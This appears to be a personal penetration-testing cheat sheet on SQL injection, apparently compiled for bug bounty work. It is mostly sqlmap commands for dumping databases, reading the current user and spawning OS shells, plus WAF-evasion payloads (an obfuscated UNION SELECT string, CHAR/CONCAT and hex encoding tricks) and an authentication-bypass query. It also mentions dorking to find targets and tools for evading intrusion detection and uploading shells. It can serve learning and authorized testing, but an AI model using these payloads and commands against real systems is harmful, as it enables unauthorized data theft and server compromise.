- SQL Injection Vulnerabilities - Bug Bounty Hunting Essentials, pg 29
SQL Injection tool that can spawn a meterpreter or VNC session back to attacker. Can return a decent number of false positives. Always verify. If you do not specify a value, SQLmap will attempt all by default
Guides and Resources
Cmds - GET
Cmds - POST
- SQLMate - Companion tool for SQLMap
- Maps out and locates admin panel
- Query dorking for finding targets
- hash lookup
- RTFM: SQLMap - pg. 71
- Operator Handbook: SQLMap - pg. 284
Specify the database type if not SQL
If you need to test and authenticated SQL injection, log into website via a browserand grab the cookie (pull from burp suite)
# sqlmap --wizard
Test if sql inject is valid (will return banner on success)
# sqlmap -u "http://domain.com?user=test&pass=test" -b
Retrieve a database username
# sqlmap -u "http://domain.com?user=test&pass=test" --current-user
sqlmap -u http://10.10.10.10 --crawl=1
sqlmap -u http://10.10.10.10 --dbms=mysql --dump
Spawn interactive shell
# sqlmap -u "http://domain.com?user=test&pass=test" --os-shell
WAF bypass and shell setup
# sqlmap -u http://10.11.0.22/debug.php?id=1 -p "id" --dbms=mysql --os-shell
- PowerUpSQL - A PowerShell Toolkit for Attacking SQL Server
- Great for evading IDS and uploading shells
- Often times IDS will either recognize SQLmap OR SQLninja but not both
- With SQLninja you must specify the vulnerable variable to inject.
- Takes more to set up with manipulation of the config file.
- DSSS - Damn Small SQLi Scanner is a fully functional SQL injection vulnerability scanner (supporting GET and POST parameters) written in under 100 lines of code.
- Many applications use web application firewalls (WAF) to help protect against any kind of SQL injection vulnerability. The only problem is that WAFs only look for certain words, characters, or patterns, meaning certain special characters used in combination can be used to evade WAF filter protection.
- For example, a very basic WAF may filter out specific SQL keywords such as
WHEREto prevent them from being used in SQL injection attacks.
- Capitalization - If the WAF's filter, like the one described above, is implemented poorly, then there may be ways to evade it by using variations of the word being filtered out. The most straightforward example is where we can bypass the filter by capitalizing some letters in the keyword, like this:
- URL Encoding - In cases where the query forms part of a URL, URL encoding may be a viable option for evading the filter. For example
%55is ‘U’ and
%53is ‘S’. The WAF may not identify these encoded characters, and may send them to the server which decodes and processes them as the intended keywords.
- Multi-line Comments - the use of multi-line comments, such as
“*/”, may cause the WAF filter to miss the keywords. MySQL will read the content between the two comment lines and execute it as SQL, whereas the DBMS may not flag it up.
- /*!%55NiOn*/ /*!%53eLEct*//**//*!12345UNION SELECT*//**//**//*!50000UNION SELECT*//**//**/UNION/**//*!50000SELECT*//**/
- The ‘+’ can be used to build an injection query without the use of quotes.
- Inline Comments - To bypass certain filters, you can abuse the inline comment system within MySQL using #.
- Reverse Function - To bypass a filter looking for certain strings, you can use the REVERSE function which will evaluate the correct way around at run time. However, when going through the filter, it will be seen as ‘noinu’ instead of ‘union’.
- String Splitting - You can split strings within the query to bypass various filters. MySQL will still execute them as keywords.
An input field may restrict the usage of certain datatypes and/or words/punctuation. This can make the exploitation of SQL injection vulnerabilities a little bit more difficult. However, two functions can be used in conjunction to bypass filters such as these:
- Within MySQL, you have to use quotation marks to input a string into a statement. However, with the use of string functions and encoding methods, you can get past this hurdle.
- To concatenate various strings inside a statement, the MySQL function
CONCAT(str1, str2, str3)
SELECT CONCAT(login, email) FROM users
- Another way to create strings without the use of quotes is the MySQL's
CHARfunction, which returns a character related to the integer passed to it. For example,
CONCATare often used together to create full sets of strings which bypass specific string filtering. This means you don't need quotation marks in the query.
- This will select data from a database that is of ‘MLK’.
- Encoding methods are another way to manipulate strings. Strings can be encoded into their Hex values either by passing a hex value or using the
- For example, the string 'password' can be passed to an SQL statement like this:
- When an application checks login credentials, it submits in a query, usually with the fields of a username and password. If the query returns with the user details, the login is successful.
- One way of bypassing the login requirement of the password, is to comment out the part of the query, after the username
- Original login query: ◇
SELECT * FROM users WHERE username = 'wiener' AND password = 'bluecheese'• Query with bypassed password field ◇
SELECT * FROM users WHERE username = 'administrator'--' AND password = ''